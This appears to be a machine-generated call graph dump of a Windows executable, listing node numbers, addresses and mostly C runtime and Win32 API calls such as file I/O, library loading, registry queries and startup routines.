__isleadbyte_l 100428->100462 100429->100428 100430->100403 100431 afde6d WriteFile 100430->100431 100431->100396 100431->100432 100432->100396 100432->100403 100432->100427 100432->100428 100433 afdec7 WriteFile 100432->100433 100433->100396 100433->100432 100434->100339 100435->100356 100436->100345 100437->100358 100438->100357 100439->100356 100440->100345 100441->100352 100442->100356 100443->100367 100444->100363 100446 b05ed3 100445->100446 100447 b05ec6 100445->100447 100449 b05edf 100446->100449 100476 af8d68 58 API calls __getptd_noexit 100446->100476 100475 af8d68 58 API calls __getptd_noexit 100447->100475 100449->100388 100451 b05ecb 100451->100388 100452 b05f00 100477 af8ff6 9 API calls _fprintf 100452->100477 100454->100376 100455->100383 100456->100401 100457->100386 100458->100391 100459->100401 100460->100381 100461->100398 100462->100428 100463->100422 100464->100401 100465->100401 100466->100409 100467->100401 100469 afc83e 100468->100469 100470 afc840 IsProcessorFeaturePresent 100468->100470 100469->100379 100472 b05b5a 100470->100472 100478 b05b09 5 API calls ___raise_securityfailure 100472->100478 100474 b05c3d 100474->100379 100475->100451 100476->100452 100477->100451 100478->100474 100479->100302 100480->100304 100504 afd703 100481->100504 100483 b00d91 100517 afd67d 59 API calls 2 library calls 100483->100517 100484 b00d3b 100484->100483 100485 b00d6f 100484->100485 100488 afd703 __chsize_nolock 58 API calls 100484->100488 100485->100483 100489 afd703 __chsize_nolock 58 API calls 100485->100489 100487 b00d99 100490 b00dbb 100487->100490 100518 af8d47 58 API calls 3 library calls 100487->100518 100491 b00d66 100488->100491 100492 b00d7b FindCloseChangeNotification 100489->100492 100490->100329 100494 afd703 __chsize_nolock 58 API calls 100491->100494 100492->100483 100495 b00d87 GetLastError 100492->100495 100494->100485 100495->100483 100496->100311 100497->100328 100498->100317 100499->100329 100500->100328 100501->100317 100502->100322 100503->100328 100505 afd70e 100504->100505 100506 afd723 100504->100506 100519 af8d34 58 API calls __getptd_noexit 100505->100519 100511 afd748 100506->100511 100521 af8d34 58 API calls __getptd_noexit 100506->100521 100508 afd713 100520 af8d68 58 API calls __getptd_noexit 100508->100520 100511->100484 100512 afd752 100522 af8d68 58 API calls __getptd_noexit 100512->100522 100514 afd71b 100514->100484 100515 afd75a 100523 af8ff6 9 API calls _fprintf 100515->100523 100517->100487 100518->100490 100519->100508 100520->100514 100521->100512 100522->100515 100523->100514 100660 ad4d13 100524->100660 100529 ad4f68 LoadLibraryExW 100670 ad4cc8 100529->100670 100530 b0dd0f 100532 ad4faa 84 API calls 100530->100532 100534 b0dd16 100532->100534 100536 ad4cc8 3 API calls 100534->100536 100537 b0dd1e 100536->100537 100696 ad506b 100537->100696 100538 ad4f8f 100538->100537 100539 ad4f9b 100538->100539 100541 ad4faa 84 API calls 100539->100541 100543 ad4fa0 100541->100543 100543->100185 100543->100188 100545 b0dd45 100704 ad5027 100545->100704 100549 b342c9 100548->100549 100550 b342ce 100549->100550 100551 b342dc 100549->100551 100552 ad81a7 59 API calls 100550->100552 100553 ad77c7 59 API calls 100551->100553 100554 b342d7 Mailbox 100552->100554 100555 b342e4 100553->100555 100554->100240 100556 ad77c7 59 API calls 100555->100556 100557 b342ec 100556->100557 100558 ad77c7 59 API calls 100557->100558 100559 b342f7 100558->100559 100560 ad77c7 59 API calls 100559->100560 100561 b342ff 100560->100561 100562 ad77c7 59 API calls 100561->100562 100563 b34307 100562->100563 100564 ad77c7 59 API calls 100563->100564 100565 b3430f 100564->100565 100566 ad77c7 59 API calls 100565->100566 100567 b34317 100566->100567 100603 b393ec __write_nolock 100602->100603 100604 af0ff6 Mailbox 59 API calls 100603->100604 100605 b39449 100604->100605 100606 ad538e 59 API calls 100605->100606 100607 b39453 100606->100607 100608 b391e9 GetSystemTimeAsFileTime 100607->100608 100657->100173 100658->100210 100659->100224 100709 ad4d61 100660->100709 100663 ad4d3a 100664 ad4d4a FreeLibrary 100663->100664 100665 ad4d53 100663->100665 100664->100665 100667 af548b 100665->100667 100666 ad4d61 2 API calls 100666->100663 100713 af54a0 100667->100713 100669 ad4f5c 100669->100529 100669->100530 100871 ad4d94 100670->100871 100672 ad4ced 100674 ad4cff FreeLibrary 100672->100674 100675 ad4d08 100672->100675 100674->100675 100677 ad4dd0 100675->100677 100676 ad4d94 2 API calls 100676->100672 100678 af0ff6 Mailbox 59 API calls 100677->100678 100679 ad4de5 100678->100679 100680 ad538e 59 API calls 100679->100680 100681 ad4df1 _memmove 100680->100681 100683 ad4ee9 100681->100683 100684 ad4f21 100681->100684 100687 ad4e2c 100681->100687 100682 ad5027 69 API calls 100692 ad4e35 100682->100692 100875 ad4fe9 CreateStreamOnHGlobal 100683->100875 100886 b39ba5 95 API calls 100684->100886 100687->100682 100688 ad506b 74 API calls 100688->100692 100690 ad4ec9 100690->100538 100691 b0dcd0 100693 ad5045 85 API calls 100691->100693 100692->100688 100692->100690 100692->100691 100881 ad5045 100692->100881 100694 b0dce4 100693->100694 100695 ad506b 74 API calls 100694->100695 100695->100690 100697 ad507d 100696->100697 100700 b0ddf6 100696->100700 100904 af5812 100697->100904 100701 b39393 101084 b391e9 100701->101084 100703 b393a9 100703->100545 100705 b0ddb9 100704->100705 100706 ad5036 100704->100706 101089 af5e90 100706->101089 100708 ad503e 100710 ad4d2e 100709->100710 100711 ad4d6a LoadLibraryA 100709->100711 100710->100663 100710->100666 100711->100710 100712 ad4d7b GetProcAddress 100711->100712 100712->100710 100716 af54ac _fprintf 100713->100716 100714 af54bf 100762 af8d68 58 API calls __getptd_noexit 100714->100762 100716->100714 100718 af54f0 100716->100718 100717 af54c4 100763 af8ff6 9 API calls _fprintf 100717->100763 100732 b00738 100718->100732 100721 af54f5 100722 af54fe 100721->100722 100723 af550b 100721->100723 100764 af8d68 58 API calls __getptd_noexit 100722->100764 100725 af5535 100723->100725 100726 af5515 100723->100726 100747 b00857 100725->100747 100765 af8d68 58 API calls __getptd_noexit 100726->100765 100727 af54cf @_EH4_CallFilterFunc@8 _fprintf 100727->100669 100733 b00744 _fprintf 100732->100733 100734 af9e4b __lock 58 API calls 100733->100734 100735 b00752 100734->100735 100736 b007cd 100735->100736 100743 af9ed3 __mtinitlocknum 58 API calls 100735->100743 100745 b007c6 100735->100745 100770 af6e8d 59 API calls __lock 100735->100770 100771 af6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100735->100771 100772 af8a5d 58 API calls 2 library calls 100736->100772 100739 b00843 _fprintf 100739->100721 100740 b007d4 100740->100745 100773 afa06b InitializeCriticalSectionAndSpinCount 100740->100773 100743->100735 100744 b007fa EnterCriticalSection 100744->100745 100767 b0084e 100745->100767 100748 b00877 __wopenfile 100747->100748 100749 b00891 100748->100749 100761 b00a4c 100748->100761 100780 af3a0b 60 API calls 2 library calls 100748->100780 100778 af8d68 58 API calls __getptd_noexit 100749->100778 100751 b00896 100779 af8ff6 9 API calls _fprintf 100751->100779 100753 b00aaf 100775 b087f1 100753->100775 100755 af5540 100766 af5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 100755->100766 100757 b00a45 100757->100761 100781 af3a0b 60 API calls 2 library calls 100757->100781 100759 b00a64 100759->100761 100782 af3a0b 60 API calls 2 library calls 100759->100782 100761->100749 100761->100753 100762->100717 100763->100727 100764->100727 100765->100727 100766->100727 100774 af9fb5 LeaveCriticalSection 100767->100774 100769 b00855 100769->100739 100770->100735 100771->100735 100772->100740 100773->100744 100774->100769 100783 b07fd5 100775->100783 100777 b0880a 100777->100755 100778->100751 100779->100755 100780->100757 100781->100759 100782->100761 100784 b07fe1 _fprintf 100783->100784 100785 b07ff7 100784->100785 100788 b0802d 100784->100788 100868 af8d68 58 API calls __getptd_noexit 100785->100868 100787 b07ffc 100869 af8ff6 9 API calls _fprintf 100787->100869 100794 b0809e 100788->100794 100791 b08049 100870 b08072 LeaveCriticalSection __unlock_fhandle 100791->100870 100793 b08006 _fprintf 100793->100777 100795 b080be 100794->100795 100796 af471a __wsopen_nolock 58 API calls 100795->100796 100799 b080da 100796->100799 100797 af9006 __invoke_watson 8 API calls 100798 b087f0 100797->100798 100800 b07fd5 __wsopen_helper 103 API calls 100798->100800 100801 b08114 100799->100801 100808 b08137 100799->100808 100867 b08211 100799->100867 100802 b0880a 100800->100802 100803 af8d34 __write 58 API calls 100801->100803 100802->100791 100804 b08119 100803->100804 100805 af8d68 _fprintf 58 API calls 100804->100805 100806 b08126 100805->100806 100807 af8ff6 _fprintf 9 API calls 100806->100807 100810 b08130 100807->100810 100809 b081f5 100808->100809 100816 b081d3 100808->100816 100811 af8d34 __write 58 API calls 100809->100811 100810->100791 100812 b081fa 100811->100812 100813 af8d68 _fprintf 58 API calls 100812->100813 100814 b08207 100813->100814 100815 af8ff6 _fprintf 9 API calls 100814->100815 100815->100867 100817 afd4d4 __alloc_osfhnd 61 API calls 100816->100817 100818 b082a1 100817->100818 100819 b082ab 100818->100819 100820 b082ce 100818->100820 100822 af8d34 __write 58 API calls 100819->100822 100821 b07f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100820->100821 100831 b082f0 100821->100831 100823 b082b0 100822->100823 100825 af8d68 _fprintf 58 API calls 100823->100825 100824 b0836e GetFileType 100826 b08379 GetLastError 100824->100826 100827 b083bb 100824->100827 100829 b082ba 100825->100829 100830 af8d47 __dosmaperr 58 API calls 100826->100830 100839 afd76a __set_osfhnd 59 API calls 100827->100839 100828 b0833c GetLastError 100832 af8d47 __dosmaperr 58 API calls 100828->100832 100833 af8d68 _fprintf 58 API calls 100829->100833 100834 b083a0 CloseHandle 100830->100834 100831->100824 100831->100828 100835 b07f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100831->100835 100836 b08361 100832->100836 100833->100810 100834->100836 100837 b083ae 100834->100837 100838 b08331 100835->100838 100841 af8d68 _fprintf 58 API calls 100836->100841 100840 af8d68 _fprintf 58 API calls 100837->100840 100838->100824 100838->100828 100843 b083d9 100839->100843 100842 b083b3 100840->100842 100841->100867 100842->100836 100844 b01b11 __lseeki64_nolock 60 API calls 100843->100844 100845 b08594 100843->100845 100862 b0845a 100843->100862 100847 b08443 100844->100847 100846 b08767 CloseHandle 100845->100846 100845->100867 100848 b07f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100846->100848 100850 af8d34 __write 58 API calls 100847->100850 100847->100862 100849 b0878e 100848->100849 100852 b08796 GetLastError 100849->100852 100853 b087c2 100849->100853 100850->100862 100851 b010ab 70 API calls __read_nolock 100851->100862 100854 af8d47 __dosmaperr 58 API calls 100852->100854 100853->100867 100855 b087a2 100854->100855 100858 afd67d __free_osfhnd 59 API calls 100855->100858 100856 b00d2d __close_nolock 61 API calls 100856->100862 100857 b0848c 100859 b099f2 __chsize_nolock 82 API calls 100857->100859 100857->100862 100858->100853 100859->100857 100860 afdac6 __write 78 API calls 100860->100862 100861 b08611 100864 b00d2d __close_nolock 61 API calls 100861->100864 100862->100845 100862->100851 100862->100856 100862->100857 100862->100860 100862->100861 100863 b01b11 60 API calls __lseeki64_nolock 100862->100863 100863->100862 100865 b08618 100864->100865 100866 af8d68 _fprintf 58 API calls 100865->100866 100866->100867 100867->100797 100868->100787 100869->100793 100870->100793 100872 ad4ce1 100871->100872 100873 ad4d9d LoadLibraryA 100871->100873 100872->100672 100872->100676 100873->100872 100874 ad4dae GetProcAddress 100873->100874 100874->100872 100876 ad5020 100875->100876 100877 ad5003 FindResourceExW 100875->100877 100876->100687 100877->100876 100878 b0dd5c LoadResource 100877->100878 100878->100876 100879 b0dd71 SizeofResource 100878->100879 100879->100876 100880 b0dd85 LockResource 100879->100880 100880->100876 100882 b0ddd4 100881->100882 100883 ad5054 100881->100883 100887 af5a7d 100883->100887 100885 ad5062 100885->100692 100886->100687 100888 af5a89 _fprintf 100887->100888 100889 af5a9b 100888->100889 100890 af5ac1 100888->100890 100900 af8d68 58 API calls __getptd_noexit 100889->100900 100892 af6e4e __lock_file 59 API calls 100890->100892 100894 af5ac7 100892->100894 100893 af5aa0 100901 af8ff6 9 API calls _fprintf 100893->100901 100902 af59ee 83 API calls 4 library calls 100894->100902 100897 af5ad6 100903 af5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 100897->100903 100899 af5aab _fprintf 100899->100885 100900->100893 100901->100899 100902->100897 100903->100899 100907 af582d 100904->100907 100906 ad508e 100906->100701 100908 af5839 _fprintf 100907->100908 100909 af584f _memset 100908->100909 100910 af587c 100908->100910 100911 af5874 _fprintf 100908->100911 100934 af8d68 58 API calls __getptd_noexit 100909->100934 100912 af6e4e __lock_file 59 API calls 100910->100912 100911->100906 100914 af5882 100912->100914 100920 af564d 100914->100920 100915 af5869 100935 af8ff6 9 API calls _fprintf 100915->100935 100923 af5668 _memset 100920->100923 100926 af5683 100920->100926 100921 af5673 101025 af8d68 58 API calls __getptd_noexit 100921->101025 100923->100921 100923->100926 100931 af56c3 100923->100931 100924 af5678 101026 af8ff6 9 API calls _fprintf 100924->101026 100936 af58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100926->100936 100928 af57d4 _memset 101028 af8d68 58 API calls __getptd_noexit 100928->101028 100929 af4916 _fprintf 58 API calls 100929->100931 100931->100926 100931->100928 100931->100929 100937 b010ab 100931->100937 101005 b00df7 100931->101005 101027 b00f18 58 API calls 3 library calls 100931->101027 100934->100915 100935->100911 100936->100911 100938 b010e3 100937->100938 100939 b010cc 100937->100939 100941 b0181b 100938->100941 100946 b0111d 100938->100946 101029 af8d34 58 API calls __getptd_noexit 100939->101029 101045 af8d34 58 API calls __getptd_noexit 100941->101045 100943 b010d1 101030 af8d68 58 API calls __getptd_noexit 100943->101030 100944 b01820 101046 af8d68 58 API calls __getptd_noexit 100944->101046 100948 b01125 100946->100948 100954 b0113c 100946->100954 101031 af8d34 58 API calls __getptd_noexit 100948->101031 100949 b01131 101047 af8ff6 9 API calls _fprintf 100949->101047 100951 b0112a 101032 af8d68 58 API calls __getptd_noexit 100951->101032 100953 b01151 101033 af8d34 58 API calls __getptd_noexit 100953->101033 100954->100953 100957 b0116b 100954->100957 100958 b01189 100954->100958 100985 b010d8 100954->100985 100957->100953 100962 b01176 100957->100962 101034 af8a5d 58 API calls 2 library calls 100958->101034 100960 b01199 100963 b011a1 100960->100963 100964 b011bc 100960->100964 100961 b05ebb __stbuf 58 API calls 100965 b0128a 100961->100965 100962->100961 101035 af8d68 58 API calls __getptd_noexit 100963->101035 101037 b01b11 60 API calls 3 library calls 100964->101037 100967 b01303 ReadFile 100965->100967 100972 b012a0 GetConsoleMode 100965->100972 100970 b017e3 GetLastError 100967->100970 100971 b01325 100967->100971 100969 b011a6 101036 af8d34 58 API calls __getptd_noexit 100969->101036 100974 b017f0 100970->100974 100975 b012e3 100970->100975 100971->100970 100979 b012f5 100971->100979 100976 b01300 100972->100976 100977 b012b4 100972->100977 101043 af8d68 58 API calls __getptd_noexit 100974->101043 100992 b012e9 100975->100992 101038 af8d47 58 API calls 3 library calls 100975->101038 100976->100967 100977->100976 100980 b012ba ReadConsoleW 100977->100980 100988 b0135a 100979->100988 100991 b015c7 100979->100991 100979->100992 100980->100979 100983 b012dd GetLastError 100980->100983 100982 b017f5 101044 af8d34 58 API calls __getptd_noexit 100982->101044 100983->100975 100985->100931 100986 af2f95 _free 58 API calls 100986->100985 100987 b01447 100987->100992 100995 b014f4 100987->100995 100998 b01504 100987->100998 101001 b014b4 MultiByteToWideChar 100987->101001 100988->100987 100990 b013c6 ReadFile 100988->100990 100994 b013e7 GetLastError 100990->100994 101003 b013f1 100990->101003 100991->100992 100993 b016cd ReadFile 100991->100993 100992->100985 100992->100986 100996 b016f0 GetLastError 100993->100996 101002 b016fe 100993->101002 100994->101003 101040 af8d68 58 API calls __getptd_noexit 100995->101040 100996->101002 100998->101001 101041 b01b11 60 API calls 3 library calls 100998->101041 101001->100983 101001->100992 101002->100991 101042 b01b11 60 API calls 3 library calls 101002->101042 101003->100988 101039 b01b11 60 API calls 3 library calls 101003->101039 101006 b00e02 101005->101006 101009 b00e17 101005->101009 101081 af8d68 58 API calls __getptd_noexit 101006->101081 101008 b00e07 101082 af8ff6 9 API calls _fprintf 101008->101082 101011 b00e4c 101009->101011 101017 b00e12 101009->101017 101083 b06234 58 API calls __malloc_crt 101009->101083 101013 af4916 _fprintf 58 API calls 101011->101013 101014 b00e60 101013->101014 101048 b00f97 101014->101048 101016 b00e67 101016->101017 101018 af4916 _fprintf 58 API calls 101016->101018 101017->100931 101019 b00e8a 101018->101019 101019->101017 101020 af4916 _fprintf 58 API calls 101019->101020 101021 b00e96 101020->101021 101021->101017 101022 af4916 _fprintf 58 API calls 101021->101022 101023 b00ea3 101022->101023 101024 af4916 _fprintf 58 API calls 101023->101024 101024->101017 101025->100924 101026->100926 101027->100931 101028->100924 101029->100943 101030->100985 101031->100951 101032->100949 101033->100951 101034->100960 101035->100969 101036->100985 101037->100962 101038->100992 101039->101003 101040->100992 101041->101001 101042->101002 101043->100982 101044->100992 101045->100944 101046->100949 101047->100985 101049 b00fa3 _fprintf 101048->101049 101050 b00fb0 101049->101050 101051 b00fc7 101049->101051 101053 af8d34 __write 58 API calls 101050->101053 101052 b0108b 101051->101052 101054 b00fdb 101051->101054 101055 af8d34 __write 58 API calls 101052->101055 101056 b00fb5 101053->101056 101058 b01006 101054->101058 101059 b00ff9 101054->101059 101060 b00ffe 101055->101060 101057 af8d68 _fprintf 58 API calls 101056->101057 101072 b00fbc _fprintf 101057->101072 101062 b01013 101058->101062 101063 b01028 101058->101063 101061 af8d34 __write 58 API calls 101059->101061 101064 af8d68 _fprintf 58 API calls 101060->101064 101061->101060 101065 af8d34 __write 58 API calls 101062->101065 101066 afd446 ___lock_fhandle 59 API calls 101063->101066 101068 b01020 101064->101068 101069 b01018 101065->101069 101067 b0102e 101066->101067 101070 b01041 101067->101070 101071 b01054 101067->101071 101075 af8ff6 _fprintf 9 API calls 101068->101075 101073 af8d68 _fprintf 58 API calls 101069->101073 101074 b010ab __read_nolock 70 API calls 101070->101074 101076 af8d68 _fprintf 58 API calls 101071->101076 101072->101016 101073->101068 101077 b0104d 101074->101077 101075->101072 101078 b01059 101076->101078 101080 b01083 __read LeaveCriticalSection 101077->101080 101079 af8d34 __write 58 API calls 101078->101079 101079->101077 101080->101072 101081->101008 101082->101017 101083->101011 101087 af543a GetSystemTimeAsFileTime 101084->101087 101086 b391f8 101086->100703 101088 af5468 __aulldiv 101087->101088 101088->101086 101090 af5e9c _fprintf 101089->101090 101091 af5eae 101090->101091 101092 af5ec3 101090->101092 101103 af8d68 58 API calls __getptd_noexit 101091->101103 101094 af6e4e __lock_file 59 API calls 101092->101094 101096 af5ec9 101094->101096 101095 af5eb3 101104 af8ff6 9 API calls _fprintf 101095->101104 101105 af5b00 67 API calls 5 library calls 101096->101105 101099 af5ed4 101106 af5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 101099->101106 101101 af5ee6 101102 af5ebe _fprintf 101101->101102 101102->100708 101103->101095 101104->101102 101105->101099 101106->101101 101226 b26641 101225->101226 101227 b2665e 101225->101227 101226->101227 101229 b26621 59 API calls Mailbox 101226->101229 101227->99689 101229->101226 101230->99696 101231 ad568a 101232 ad5c18 59 API calls 101231->101232 101233 ad569c 101232->101233 101234 ad5632 61 API calls 101233->101234 101235 ad56aa 101234->101235 101237 ad56ba Mailbox 101235->101237 101238 ad81c1 61 API calls Mailbox 101235->101238 101238->101237 101239 b10226 101245 adade2 Mailbox 101239->101245 101241 b10c86 101242 b266f4 Mailbox 59 API calls 101241->101242 101243 b10c8f 101242->101243 101244 ad9df0 Mailbox 59 API calls 101244->101245 101245->101241 101245->101243 101245->101244 101246 b100e0 VariantClear 101245->101246 101247 adb6c1 101245->101247 101249 b4e237 130 API calls 101245->101249 101250 b3d2e6 101 API calls 101245->101250 101251 b4474d 331 API calls 101245->101251 101252 b523c9 87 API calls 101245->101252 101253 ae2123 95 API calls 101245->101253 101254 b4e24b 130 API calls 101245->101254 101255 b27405 59 API calls 101245->101255 101246->101245 101256 b3a0b5 89 API calls 4 library calls 101247->101256 101249->101245 101250->101245 101251->101245 101252->101245 101253->101245 101254->101245 101255->101245 101256->101241 101257 ad1055 101262 ad2649 101257->101262 101260 af2f80 __cinit 67 API calls 101261 ad1064 101260->101261 101263 ad77c7 59 API calls 101262->101263 101264 ad26b7 101263->101264 101269 ad3582 101264->101269 101266 ad2754 101267 ad105a 101266->101267 101272 ad3416 59 API calls 2 library calls 101266->101272 101267->101260 101273 ad35b0 101269->101273 101272->101266 101274 ad35bd 101273->101274 101275 ad35a1 101273->101275 101274->101275 101276 ad35c4 RegOpenKeyExW 101274->101276 101275->101266 101276->101275 101277 ad35de RegQueryValueExW 101276->101277 101278 ad35ff 101277->101278 101279 ad3614 RegCloseKey 101277->101279 101278->101279 101279->101275 101280 ad1016 101285 ad4ad2 101280->101285 101283 af2f80 __cinit 67 API calls 101284 ad1025 101283->101284 101286 af0ff6 Mailbox 59 API calls 101285->101286 101287 ad4ada 101286->101287 101289 ad101b 101287->101289 101292 ad4a94 101287->101292 101289->101283 101293 ad4a9d 101292->101293 101294 ad4aaf 101292->101294 101295 af2f80 __cinit 67 API calls 101293->101295 101296 ad4afe 101294->101296 101295->101294 101297 ad77c7 59 API calls 101296->101297 101298 ad4b16 GetVersionExW 101297->101298 101299 ad7d2c 59 API calls 101298->101299 101300 ad4b59 101299->101300 101301 ad7e8c 59 API calls 101300->101301 101304 ad4b86 101300->101304 101302 ad4b7a 101301->101302 101303 ad7886 59 API calls 101302->101303 101303->101304 101305 b0dc8d 101304->101305 101306 ad4bf1 GetCurrentProcess IsWow64Process 101304->101306 101307 ad4c0a 101306->101307 101308 ad4c89 GetSystemInfo 101307->101308 101309 ad4c20 101307->101309 101310 ad4c56 101308->101310 101320 ad4c95 101309->101320 101310->101289 101313 ad4c7d GetSystemInfo 101315 ad4c47 101313->101315 101314 ad4c32 101316 ad4c95 2 API calls 101314->101316 101315->101310 101318 ad4c4d FreeLibrary 101315->101318 101317 ad4c3a GetNativeSystemInfo 101316->101317 101317->101315 101318->101310 101321 ad4c2e 101320->101321 101322 ad4c9e LoadLibraryA 101320->101322 101321->101313 101321->101314 101322->101321 101323 ad4caf GetProcAddress 101322->101323 101323->101321 101324 ad1066 101329 adf8cf 101324->101329 101326 ad106c 101327 af2f80 __cinit 67 API calls 101326->101327 101328 ad1076 101327->101328 101330 adf8f0 101329->101330 101362 af0143 101330->101362 101334 adf937 101335 ad77c7 59 API calls 101334->101335 101336 adf941 101335->101336 101337 ad77c7 59 API calls 101336->101337 101338 adf94b 101337->101338 101339 ad77c7 59 API calls 101338->101339 101340 adf955 101339->101340 101341 ad77c7 59 API calls 101340->101341 101342 adf993 101341->101342 101343 ad77c7 59 API calls 101342->101343 101344 adfa5e 101343->101344 101372 ae60e7 101344->101372 101348 adfa90 101349 ad77c7 59 API calls 101348->101349 101350 adfa9a 101349->101350 101400 aeffde 101350->101400 101352 adfae1 101353 adfaf1 GetStdHandle 101352->101353 101354 adfb3d 101353->101354 101355 b149d5 101353->101355 101356 adfb45 OleInitialize 101354->101356 101355->101354 101357 b149de 101355->101357 101356->101326 101407 b36dda 64 API calls Mailbox 101357->101407 101359 b149e5 101408 b374a9 CreateThread 101359->101408 101361 b149f1 CloseHandle 101361->101356 101409 af021c 101362->101409 101365 af021c 59 API calls 101366 af0185 101365->101366 101367 ad77c7 59 API calls 101366->101367 101368 af0191 101367->101368 101369 ad7d2c 59 API calls 101368->101369 101370 adf8f6 101369->101370 101371 af03a2 6 API calls 101370->101371 101371->101334 101373 ad77c7 59 API calls 101372->101373 101374 ae60f7 101373->101374 101375 ad77c7 59 API calls 101374->101375 101376 ae60ff 101375->101376 101416 ae5bfd 101376->101416 101379 ae5bfd 59 API calls 101380 ae610f 101379->101380 101381 ad77c7 59 API calls 101380->101381 101382 ae611a 101381->101382 101383 af0ff6 Mailbox 59 API calls 101382->101383 101384 adfa68 101383->101384 101385 ae6259 101384->101385 101386 ae6267 101385->101386 101387 ad77c7 59 API calls 101386->101387 101388 ae6272 101387->101388 101389 ad77c7 59 API calls 101388->101389 101390 ae627d 101389->101390 101391 ad77c7 59 API calls 101390->101391 101392 ae6288 101391->101392 101393 ad77c7 59 API calls 101392->101393 101394 ae6293 101393->101394 101395 ae5bfd 59 API calls 101394->101395 101396 ae629e 101395->101396 101397 af0ff6 Mailbox 59 API calls 101396->101397 101398 ae62a5 RegisterWindowMessageW 101397->101398 101398->101348 101401 aeffee 101400->101401 101402 b25cc3 101400->101402 101404 af0ff6 Mailbox 59 API calls 101401->101404 101419 b39d71 60 API calls 101402->101419 101406 aefff6 101404->101406 101405 b25cce 101406->101352 101407->101359 101408->101361 101420 b3748f 65 API calls 101408->101420 101410 ad77c7 59 API calls 101409->101410 101411 af0227 101410->101411 101412 ad77c7 59 API calls 101411->101412 101413 af022f 101412->101413 101414 ad77c7 59 API calls 101413->101414 101415 af017b 101414->101415 101415->101365 101417 ad77c7 59 API calls 101416->101417 101418 ae5c05 101417->101418 101418->101379 101419->101405 101421 af7e93 101422 af7e9f _fprintf 101421->101422 101458 afa048 GetStartupInfoW 101422->101458 101424 af7ea4 101460 af8dbc GetProcessHeap 101424->101460 101426 af7efc 101427 af7f07 101426->101427 101543 af7fe3 58 API calls 3 library calls 101426->101543 101461 af9d26 101427->101461 101430 af7f0d 101431 af7f18 __RTC_Initialize 101430->101431 101544 af7fe3 58 API calls 3 library calls 101430->101544 101482 afd812 101431->101482 101434 af7f27 101435 af7f33 GetCommandLineW 101434->101435 101545 af7fe3 58 API calls 3 library calls 101434->101545 101501 b05173 GetEnvironmentStringsW 101435->101501 101438 af7f32 101438->101435 101441 af7f4d 101442 af7f58 101441->101442 101546 af32f5 58 API calls 3 library calls 101441->101546 101511 b04fa8 101442->101511 101445 af7f5e 101446 af7f69 101445->101446 101547 af32f5 58 API calls 3 library calls 101445->101547 101525 af332f 101446->101525 101449 af7f71 101450 af7f7c __wwincmdln 101449->101450 101548 af32f5 58 API calls 3 library calls 101449->101548 101531 ad492e 101450->101531 101453 af7f90 101454 af7f9f 101453->101454 101549 af3598 58 API calls _doexit 101453->101549 101550 af3320 58 API calls _doexit 101454->101550 101457 af7fa4 _fprintf 101459 afa05e 101458->101459 101459->101424 101460->101426 101551 af33c7 36 API calls 2 library calls 101461->101551 101463 af9d2b 101552 af9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 101463->101552 101465 af9d30 101466 af9d34 101465->101466 101554 af9fca TlsAlloc 101465->101554 101553 af9d9c 61 API calls 2 library calls 101466->101553 101469 af9d39 101469->101430 101470 af9d46 101470->101466 101471 af9d51 101470->101471 101555 af8a15 101471->101555 101474 af9d93 101563 af9d9c 61 API calls 2 library calls 101474->101563 101477 af9d98 101477->101430 101478 af9d72 101478->101474 101479 af9d78 101478->101479 101562 af9c73 58 API calls 4 library calls 101479->101562 101481 af9d80 GetCurrentThreadId 101481->101430 101483 afd81e _fprintf 101482->101483 101484 af9e4b __lock 58 API calls 101483->101484 101485 afd825 101484->101485 101486 af8a15 __calloc_crt 58 API calls 101485->101486 101489 afd836 101486->101489 101487 afd841 @_EH4_CallFilterFunc@8 _fprintf 101487->101434 101488 afd8a1 GetStartupInfoW 101495 afd8b6 101488->101495 101498 afd9e5 101488->101498 101489->101487 101489->101488 101490 afdaad 101577 afdabd LeaveCriticalSection _doexit 101490->101577 101492 af8a15 __calloc_crt 58 API calls 101492->101495 101493 afda32 GetStdHandle 101493->101498 101494 afda45 GetFileType 101494->101498 101495->101492 101497 afd904 101495->101497 101495->101498 101496 afd938 GetFileType 101496->101497 101497->101496 101497->101498 101575 afa06b InitializeCriticalSectionAndSpinCount 101497->101575 101498->101490 101498->101493 101498->101494 101576 afa06b InitializeCriticalSectionAndSpinCount 101498->101576 101502 b05184 101501->101502 101503 af7f43 101501->101503 101578 af8a5d 58 API calls 2 library calls 101502->101578 101507 b04d6b GetModuleFileNameW 101503->101507 101505 b051c0 FreeEnvironmentStringsW 101505->101503 101506 b051aa _memmove 101506->101505 101508 b04d9f _wparse_cmdline 101507->101508 101510 b04ddf _wparse_cmdline 101508->101510 101579 af8a5d 58 API calls 2 library calls 101508->101579 101510->101441 101512 b04fc1 __wsetenvp 101511->101512 101513 b04fb9 101511->101513 101514 af8a15 __calloc_crt 58 API calls 101512->101514 101513->101445 101518 b04fea __wsetenvp 101514->101518 101515 b05041 101516 af2f95 _free 58 API calls 101515->101516 101516->101513 101517 af8a15 __calloc_crt 58 API calls 101517->101518 101518->101513 101518->101515 101518->101517 101519 b05066 101518->101519 101522 b0507d 101518->101522 101580 b04857 58 API calls _fprintf 101518->101580 101520 af2f95 _free 58 API calls 101519->101520 101520->101513 101581 af9006 IsProcessorFeaturePresent 101522->101581 101524 b05089 101524->101445 101527 af333b __IsNonwritableInCurrentImage 101525->101527 101596 afa711 101527->101596 101528 af3359 __initterm_e 101529 af2f80 __cinit 67 API calls 101528->101529 101530 af3378 __cinit __IsNonwritableInCurrentImage 101528->101530 101529->101530 101530->101449 101532 ad4948 101531->101532 101542 ad49e7 101531->101542 101533 ad4982 IsThemeActive 101532->101533 101599 af35ac 101533->101599 101537 ad49ae 101611 ad4a5b SystemParametersInfoW SystemParametersInfoW 101537->101611 101539 ad49ba 101612 ad3b4c 101539->101612 101542->101453 101543->101427 101544->101431 101545->101438 101549->101454 101550->101457 101551->101463 101552->101465 101553->101469 101554->101470 101556 af8a1c 101555->101556 101558 af8a57 101556->101558 101560 af8a3a 101556->101560 101564 b05446 101556->101564 101558->101474 101561 afa026 TlsSetValue 101558->101561 101560->101556 101560->101558 101572 afa372 Sleep 101560->101572 101561->101478 101562->101481 101563->101477 101565 b05451 101564->101565 101570 b0546c 101564->101570 101566 b0545d 101565->101566 101565->101570 101573 